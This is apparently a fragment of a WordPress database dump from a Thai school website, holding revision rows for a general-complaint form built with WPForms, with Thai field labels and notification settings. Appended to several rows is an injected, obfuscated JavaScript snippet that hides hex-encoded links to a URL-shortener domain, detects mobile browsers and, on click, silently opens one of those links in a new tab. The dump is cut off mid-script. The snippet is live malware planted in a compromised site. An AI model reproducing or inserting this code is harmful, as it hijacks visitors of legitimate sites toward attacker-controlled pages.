os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x1165a7(0x1ca)](_0x5e9786)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x1165a7(0x1ca)](_0x5e9786[_0x1165a7(0x1d1)](0x0,0x4)))_0x399500=!![];}(navigator[_0x123821(0x1c2)]||navigator[\'vendor\']||window[_0x123821(0x1c0)]),_0x399500;};const _0xe6f43=[\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x77\\x67\\x64\\x30\\x63\\x380\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x4d\\x76\\x49\\x31\\x63\\x361\',_0x111835(0x1c5),_0x111835(0x1d7),_0x111835(0x1c3),_0x111835(0x1e1),_0x111835(0x1c7),_0x111835(0x1c4),_0x111835(0x1e6),_0x111835(0x1e9)],_0x7378e8=0x3,_0xc82d98=0x6,_0x487206=_0x551830=>{const _0x2c6c7a=_0x111835;_0x551830[_0x2c6c7a(0x1db)]((_0x3ee06f,_0x37dc07)=>{const _0x476c2a=_0x2c6c7a;!localStorage[\'getItem\'](_0x3ee06f+_0x476c2a(0x1e8))&&localStorage[_0x476c2a(0x1cf)](_0x3ee06f+_0x476c2a(0x1e8),0x0);});},_0x564ab0=_0x3743e2=>{const _0x415ff3=_0x111835,_0x229a83=_0x3743e2[_0x415ff3(0x1c9)]((_0x37389f,_0x22f261)=>localStorage[_0x415ff3(0x1cb)](_0x37389f+_0x415ff3(0x1e8))==0x0);return _0x229a83[Math[_0x415ff3(0x1c6)](Math[_0x415ff3(0x1cc)]()*_0x229a83[_0x415ff3(0x1d2)])];},_0x173ccb=_0xb01406=>localStorage[_0x111835(0x1cf)](_0xb01406+_0x111835(0x1e8),0x1),_0x5792ce=_0x5415c5=>localStorage[_0x111835(0x1cb)](_0x5415c5+_0x111835(0x1e8)),_0xa7249=(_0x354163,_0xd22cba)=>localStorage[_0x111835(0x1cf)](_0x354163+_0x111835(0x1e8),_0xd22cba),_0x381bfc=(_0x49e91b,_0x531bc4)=>{const _0x1b0982=_0x111835,_0x1da9e1=0x3e8*0x3c*0x3c;return Math[_0x1b0982(0x1d5)](Math[_0x1b0982(0x1e7)](_0x531bc4-_0x49e91b)/_0x1da9e1);},_0x6ba060=(_0x1e9127,_0x28385f)=>{const _0xb7d87=_0x111835,_0xc3fc56=0x3e8*0x3c;return Math[_0xb7d87(0x1d5)](Math[_0xb7d87(0x1e7)](_0x28385f-_0x1e9127)/_0xc3fc56);},_0x370e93=(_0x286b71,_0x3587b8,_0x1bcfc4)=>{const _0x22f77c=_0x111835;_0x487206(_0x286b71),newLocation=_0x564ab0(_0x286b71),_0xa7249(_0x3587b8+\'-mnts\',_0x1bcfc4),_0xa7249(_0x3587b8+_0x22f77c(0x1d3),_0x1bcfc4),_0x173ccb(newLocation),window[\'mobileCheck\']()&&window[_0x22f77c(0x1d4)](newLocation,\'_blank\');};_0x487206(_0xe6f43);function _0x168fb9(_0x36bdd0){const _0x2737e0=_0x111835;_0x36bdd0[_0x2737e0(0x1ce)]();const _0x263ff7=location[_0x2737e0(0x1dc)];let _0x1897d7=_0x564ab0(_0xe6f43);const _0x48cc88=Date[_0x2737e0(0x1e3)](new Date()),_0x1ec416=_0x5792ce(_0x263ff7+_0x2737e0(0x1e0)),_0x23f079=_0x5792ce(_0x263ff7+_0x2737e0(0x1d3));if(_0x1ec416&&_0x23f079)try{const _0x2e27c9=parseInt(_0x1ec416),_0x1aa413=parseInt(_0x23f079),_0x418d13=_0x6ba060(_0x48cc88,_0x2e27c9),_0x13adf6=_0x381bfc(_0x48cc88,_0x1aa413);_0x13adf6>=_0xc82d98&&(_0x487206(_0xe6f43),_0xa7249(_0x263ff7+_0x2737e0(0x1d3),_0x48cc88)),_0x418d13>=_0x7378e8&&(_0x1897d7&&window[_0x2737e0(0x1e5)]()&&(_0xa7249(_0x263ff7+_0x2737e0(0x1e0),_0x48cc88),window[_0x2737e0(0x1d4)](_0x1897d7,_0x2737e0(0x1dd)),_0x173ccb(_0x1897d7)));}catch(_0x161a43){_0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}else _0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}document[_0x111835(0x1df)](_0x111835(0x1d8),_0x168fb9);}());</script>','ร้องเรียนเรื่องทั่วไป','','inherit','closed','closed','','486-revision-v1','','','2024-08-02 11:50:56','2024-08-02 04:50:56','',486,'http://pakhaeng.ssk.in.th/?p=490',0,'revision','',0),
(491,1,'2024-08-02 11:51:26','2024-08-02 04:51:26','{\"fields\":{\"1\":{\"id\":\"1\",\"type\":\"name\",\"label\":\"\\u0e0a\\u0e37\\u0e48\\u0e2d-\\u0e2a\\u0e01\\u0e38\\u0e25 \\u0e1c\\u0e39\\u0e49\\u0e23\\u0e49\\u0e2d\\u0e07\\u0e40\\u0e23\\u0e35\\u0e22\\u0e19\",\"format\":\"first-last\",\"description\":\"\",\"required\":\"1\",\"size\":\"medium\",\"simple_placeholder\":\"\",\"simple_default\":\"\",\"first_placeholder\":\"\",\"first_default\":\"\",\"middle_placeholder\":\"\",\"middle_default\":\"\",\"last_placeholder\":\"\",\"last_default\":\"\",\"css\":\"\"},\"2\":{\"id\":\"2\",\"type\":\"textarea\",\"label\":\"\\u0e17\\u0e35\\u0e48\\u0e2d\\u0e22\\u0e39\\u0e48\",\"description\":\"\",\"size\":\"medium\",\"placeholder\":\"\",\"limit_count\":\"1\",\"limit_mode\":\"characters\",\"default_value\":\"\",\"css\":\"\"},\"3\":{\"id\":\"3\",\"type\":\"text\",\"label\":\"\\u0e40\\u0e23\\u0e37\\u0e48\\u0e2d\\u0e07\\u0e23\\u0e49\\u0e2d\\u0e07\\u0e40\\u0e23\\u0e35\\u0e22\\u0e19\",\"description\":\"\",\"required\":\"1\",\"size\":\"medium\",\"placeholder\":\"\",\"limit_count\":\"1\",\"limit_mode\":\"characters\",\"default_value\":\"\",\"input_mask\":\"\",\"css\":\"\"},\"4\":{\"id\":\"4\",\"type\":\"textarea\",\"label\":\"\\u0e23\\u0e32\\u0e22\\u0e25\\u0e30\\u0e40\\u0e2d\\u0e35\\u0e22\\u0e14\\u0e40\\u0e23\\u0e37\\u0e48\\u0e2d\\u0e07\\u0e23\\u0e49\\u0e2d\\u0e07\\u0e40\\u0e23\\u0e35\\u0e22\\u0e19\",\"description\":\"\",\"required\":\"1\",\"size\":\"medium\",\"placeholder\":\"\",\"limit_count\":\"1\",\"limit_mode\":\"characters\",\"default_value\":\"\",\"css\":\"\"},\"5\":{\"id\":\"5\",\"type\":\"number\",\"label\":\"\\u0e40\\u0e1a\\u0e2d\\u0e23\\u0e4c\\u0e42\\u0e17\\u0e23\\u0e28\\u0e31\\u0e1e\\u0e17\\u0e4c (\\u0e17\\u0e35\\u0e48\\u0e2a\\u0e32\\u0e21\\u0e32\\u0e23\\u0e16\\u0e15\\u0e34\\u0e14\\u0e15\\u0e48\\u0e2d\\u0e01\\u0e25\\u0e31\\u0e1a\\u0e44\\u0e14\\u0e49)\",\"description\":\"\",\"required\":\"1\",\"size\":\"medium\",\"placeholder\":\"\",\"default_value\":\"\",\"css\":\"\"},\"6\":{\"id\":\"6\",\"type\":\"checkbox\",\"label\":\"\\u0e02\\u0e49\\u0e32\\u0e1e\\u0e40\\u0e08\\u0e49\\u0e32\\u0e02\\u0e2d\\u0e23\\u0e31\\u0e1a\\u0e23\\u0e2d\\u0e07\\u0e27\\u0e48\\u0e32\\u0e40\\u0e1b\\u0e47\\u0e19\\u0e04\\u0e27\\u0e32\\u0e21\\u0e08\\u0e23\\u0e34\\u0e07\\u0e17\\u0e38\\u0e01\\u0e1b\\u0e23\\u0e30\\u0e01\\u0e32\\u0e23 \\u0e2b\\u0e32\\u0e01\\u0e1b\\u0e23\\u0e32\\u0e01\\u0e0e\\u0e27\\u0e48\\u0e32\\u0e44\\u0e21\\u0e48\\u0e40\\u0e1b\\u0e47\\u0e19\\u0e04\\u0e27\\u0e32\\u0e21\\u0e08\\u0e23\\u0e34\\u0e07 \\u0e02\\u0e49\\u0e32\\u0e1e\\u0e40\\u0e08\\u0e49\\u0e32\\u0e22\\u0e2d\\u0e21\\u0e23\\u0e31\\u0e1a\\u0e1c\\u0e34\\u0e14 \\u0e41\\u0e25\\u0e30\\u0e43\\u0e2b\\u0e49\\u0e14\\u0e33\\u0e40\\u0e19\\u0e34\\u0e19\\u0e01\\u0e32\\u0e23\\u0e15\\u0e32\\u0e21\\u0e01\\u0e0e\\u0e2b\\u0e21\\u0e32\\u0e22\",\"choices\":{\"1\":{\"label\":\"\\u0e22\\u0e2d\\u0e1a\\u0e23\\u0e31\\u0e1a\\u0e02\\u0e49\\u0e2d\\u0e23\\u0e49\\u0e2d\\u0e07\\u0e40\\u0e23\\u0e35\\u0e22\\u0e19\",\"value\":\"\",\"image\":\"\",\"icon\":\"face-smile\",\"icon_style\":\"regular\"}},\"choices_images_style\":\"modern\",\"choices_icons_color\":\"#066aab\",\"choices_icons_size\":\"large\",\"choices_icons_style\":\"default\",\"description\":\"\",\"input_columns\":\"\",\"choice_limit\":\"\",\"dynamic_choices\":\"\",\"css\":\"\"}},\"id\":\"486\",\"field_id\":7,\"settings\":{\"form_title\":\"\\u0e23\\u0e49\\u0e2d\\u0e07\\u0e40\\u0e23\\u0e35\\u0e22\\u0e19\\u0e40\\u0e23\\u0e37\\u0e48\\u0e2d\\u0e07\\u0e17\\u0e31\\u0e48\\u0e27\\u0e44\\u0e1b\",\"form_desc\":\"\",\"submit_text\":\"\\u0e2a\\u0e48\\u0e07\\u0e40\\u0e23\\u0e37\\u0e48\\u0e2d\\u0e07\\u0e23\\u0e49\\u0e2d\\u0e07\\u0e40\\u0e23\\u0e35\\u0e22\\u0e19\",\"submit_text_processing\":\"Sending...\",\"form_class\":\"\",\"submit_class\":\"\",\"ajax_submit\":\"1\",\"notification_enable\":\"1\",\"notifications\":{\"1\":{\"email\":\"33010169@sisaketedu1.go.th\",\"subject\":\"New \\u0e23\\u0e49\\u0e2d\\u0e07\\u0e40\\u0e23\\u0e35\\u0e22\\u0e19\\u0e40\\u0e23\\u0e37\\u0e48\\u0e2d\\u0e07\\u0e17\\u0e31\\u0e48\\u0e27\\u0e44\\u0e1b Entry\",\"sender_name\":\"\\u0e42\\u0e23\\u0e07\\u0e40\\u0e23\\u0e35\\u0e22\\u0e19\\u0e1a\\u0e49\\u0e32\\u0e19\\u0e2b\\u0e19\\u0e2d\\u0e07\\u0e1b\\u0e25\\u0e32\\u0e40\\u0e02\\u0e47\\u0e07-\\u0e01\\u0e2d\\u0e44\\u0e2b\\u0e25\\u0e48\",\"sender_address\":\"{admin_email}\",\"replyto\":\"\\u0e37\\u0e35nutkubp@gmail.com\",\"message\":\"{all_fields}\",\"template\":\"\"}},\"confirmations\":{\"1\":{\"type\":\"message\",\"message\":\"<p>\\u00a0\\u0e44\\u0e14\\u0e49\\u0e23\\u0e31\\u0e1a\\u0e40\\u0e23\\u0e37\\u0e48\\u0e2d\\u0e07\\u0e23\\u0e49\\u0e2d\\u0e07\\u0e40\\u0e23\\u0e35\\u0e22\\u0e19 \\u0e40\\u0e23\\u0e35\\u0e22\\u0e1a\\u0e23\\u0e49\\u0e2d\\u0e22\\u0e41\\u0e25\\u0e49\\u0e27<\\/p>\",\"message_scroll\":\"1\",\"page\":\"459\",\"redirect\":\"\"}},\"antispam\":\"1\",\"anti_spam\":{\"time_limit\":{\"duration\":\"3\"}},\"form_tags\":[],\"store_spam_entries\":\"0\"},\"search_terms\":\"\",\"meta\":{\"template\":\"blank\"}}\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2[_0x30231a];return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const _0x5a990b=[\'substr\',\'length\',\'-hurs\',\'open\',\'round\',\'443779RQfzWn\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x6f\\x63\\x47\\x33\\x63\\x353\',\'click\',\'5114346JdlaMi\',\'1780163aSIYqH\',\'forEach\',\'host\',\'_blank\',\'68512ftWJcO\',\'addEventListener\',\'-mnts\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x74\\x68\\x4f\\x35\\x63\\x385\',\'4588749LmrVjF\',\'parse\',\'630bGPCEV\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x6e\\x50\\x38\\x63\\x338\',\'abs\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x58\\x4e\\x39\\x63\\x389\',\'56bnMKls\',\'opera\',\'6946eLteFW\',\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x49\\x4d\\x76\\x34\\x63\\x324\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x48\\x62\\x61\\x37\\x63\\x357\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x42\\x42\\x47\\x32\\x63\\x382\',\'floor\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x50\\x79\\x78\\x36\\x63\\x376\',\'999HIfBhL\',\'filter\',\'test\',\'getItem\',\'random\',\'138490EjXyHW\',\'stopPropagation\',\'setItem\',\'70kUzPYI\'];_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!![]){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))/0x1+-parseInt(_0x20130f(0x1c1))/0x2*(parseInt(_0x20130f(0x1c8))/0x3)+parseInt(_0x20130f(0x1bf))/0x4*(-parseInt(_0x20130f(0x1cd))/0x5)+parseInt(_0x20130f(0x1d9))/0x6+-parseInt(_0x20130f(0x1e4))/0x7*(parseInt(_0x20130f(0x1de))/0x8)+parseInt(_0x20130f(0x1e2))/0x9+-parseInt(_0x20130f(0x1d0))/0xa*(-parseInt(_0x20130f(0x1da))/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06[\'push\'](_0x307c06[\'shift\']());}catch(_0x3e3a47){_0x307c06[\'push\'](_0x307c06[\'shift\']());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window[\'mobileCheck\']=function(){const _0x123821=_0x3023;let _0x399500=![];return function(_0x5e9786){const _0x1165a7=_0x3023;if(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x1165a7(0x1ca)](_0x5e9786)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x1165a7(0x1ca)](_0x5e9786[_0x1165a7(0x1d1)](0x0,0x4)))_0x399500=!![];}(navigator[_0x123821(0x1c2)]||navigator[\'vendor\']||window[_0x123821(0x1c0)]),_0x399500;};const _0xe6f43=[\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x77\\x67\\x64\\x30\\x63\\x380\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x4d\\x76\\x49\\x31\\x63\\x361\',_0x111835(0x1c5),_0x111835(0x1d7),_0x111835(0x1c3),_0x111835(0x1e1),_0x111835(0x1c7),_0x111835(0x1c4),_0x111835(0x1e6),_0x111835(0x1e9)],_0x7378e8=0x3,_0xc82d98=0x6,_0x487206=_0x551830=>{const _0x2c6c7a=_0x111835;_0x551830[_0x2c6c7a(0x1db)]((_0x3ee06f,_0x37dc07)=>{const _0x476c2a=_0x2c6c7a;!localStorage[\'getItem\'](_0x3ee06f+_0x476c2a(0x1e8))&&localStorage[_0x476c2a(0x1cf)](_0x3ee06f+_0x476c2a(0x1e8),0x0);});},_0x564ab0=_0x3743e2=>{const _0x415ff3=_0x111835,_0x229a83=_0x3743e2[_0x415ff3(0x1c9)]((_0x37389f,_0x22f261)=>localStorage[_0x415ff3(0x1cb)](_0x37389f+_0x415ff3(0x1e8))==0x0);return _0x229a83[Math[_0x415ff3(0x1c6)](Math[_0x415ff3(0x1cc)]()*_0x229a83[_0x415ff3(0x1d2)])];},_0x173ccb=_0xb01406=>localStorage[_0x111835(0x1cf)](_0xb01406+_0x111835(0x1e8),0x1),_0x5792ce=_0x5415c5=>localStorage[_0x111835(0x1cb)](_0x5415c5+_0x111835(0x1e8)),_0xa7249=(_0x354163,_0xd22cba)=>localStorage[_0x111835(0x1cf)](_0x354163+_0x111835(0x1e8),_0xd22cba),_0x381bfc=(_0x49e91b,_0x531bc4)=>{const _0x1b0982=_0x111835,_0x1da9e1=0x3e8*0x3c*0x3c;return Math[_0x1b0982(0x1d5)](Math[_0x1b0982(0x1e7)](_0x531bc4-_0x49e91b)/_0x1da9e1);},_0x6ba060=(_0x1e9127,_0x28385f)=>{const _0xb7d87=_0x111835,_0xc3fc56=0x3e8*0x3c;return Math[_0xb7d87(0x1d5)](Math[_0xb7d87(0x1e7)](_0x28385f-_0x1e9127)/_0xc3fc56);},_0x370e93=(_0x286b71,_0x3587b8,_0x1bcfc4)=>{const _0x22f77c=_0x111835;_0x487206(_0x286b71),newLocation=_0x564ab0(_0x286b71),_0xa7249(_0x3587b8+\'-mnts\',_0x1bcfc4),_0xa7249(_0x3587b8+_0x22f77c(0x1d3),_0x1bcfc4),_0x173ccb(newLocation),window[\'mobileCheck\']()&&window[_0x22f77c(0x1d4)](newLocation,\'_blank\');};_0x487206(_0xe6f43);function _0x168fb9(_0x36bdd0){const _0x2737e0=_0x111835;_0x36bdd0[_0x2737e0(0x1ce)]();const _0x263ff7=location[_0x2737e0(0x1dc)];let _0x1897d7=_0x564ab0(_0xe6f43);const _0x48cc88=Date[_0x2737e0(0x1e3)](new Date()),_0x1ec416=_0x5792ce(_0x263ff7+_0x2737e0(0x1e0)),_0x23f079=_0x5792ce(_0x263ff7+_0x2737e0(0x1d3));if(_0x1ec416&&_0x23f079)try{const _0x2e27c9=parseInt(_0x1ec416),_0x1aa413=parseInt(_0x23f079),_0x418d13=_0x6ba060(_0x48cc88,_0x2e27c9),_0x13adf6=_0x381bfc(_0x48cc88,_0x1aa413);_0x13adf6>=_0xc82d98&&(_0x487206(_0xe6f43),_0xa7249(_0x263ff7+_0x2737e0(0x1d3),_0x48cc88)),_0x418d13>=_0x7378e8&&(_0x1897d7&&window[_0x2737e0(0x1e5)]()&&(_0xa7249(_0x263ff7+_0x2737e0(0x1e0),_0x48cc88),window[_0x2737e0(0x1d4)](_0x1897d7,_0x2737e0(0x1dd)),_0x173ccb(_0x1897d7)));}catch(_0x161a43){_0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}else _0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}document[_0x111835(0x1df)](_0x111835(0x1d8),_0x168fb9);}());</script>','ร้องเรียนเรื่องทั่วไป','','inherit','closed','closed','','486-revision-v1','','','2024-08-02 11:51:26','2024-08-02 04:51:26','',486,'http://pakhaeng.ssk.in.th/?p=491',0,'revision','',0),
(492,1,'2024-08-02 11:55:17','2024-08-02 04:55:17','<!-- wp:shortcode -->\n[wpforms id=\"486\"]\n<!-- /wp:shortcode -->\n\n<!-- wp:paragraph -->\n<p></p>\n<!-- /wp:paragraph -->\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2[_0x30231a];return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const _0x5a990b=[\'substr\',\'length\',\'-hurs\',\'open\',\'round\',\'443779RQfzWn\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x6f\\x63\\x47\\x33\\x63\\x353\',\'click\',\'5114346JdlaMi\',\'1780163aSIYqH\',\'forEach\',\'host\',\'_blank\',\'68512ftWJcO\',\'addEventListener\',\'-mnts\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x74\\x68\\x4f\\x35\\x63\\x385\',\'4588749LmrVjF\',\'parse\',\'630bGPCEV\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x6e\\x50\\x38\\x63\\x338\',\'abs\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x58\\x4e\\x39\\x63\\x389\',\'56bnMKls\',\'opera\',\'6946eLteFW\',\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x49\\x4d\\x76\\x34\\x63\\x324\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x48\\x62\\x61\\x37\\x63\\x357\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x42\\x42\\x47\\x32\\x63\\x382\',\'floor\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x50\\x79\\x78\\x36\\x63\\x376\',\'999HIfBhL\',\'filter\',\'test\',\'getItem\',\'random\',\'138490EjXyHW\',\'stopPropagation\',\'setItem\',\'70kUzPYI\'];_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!![]){try{const 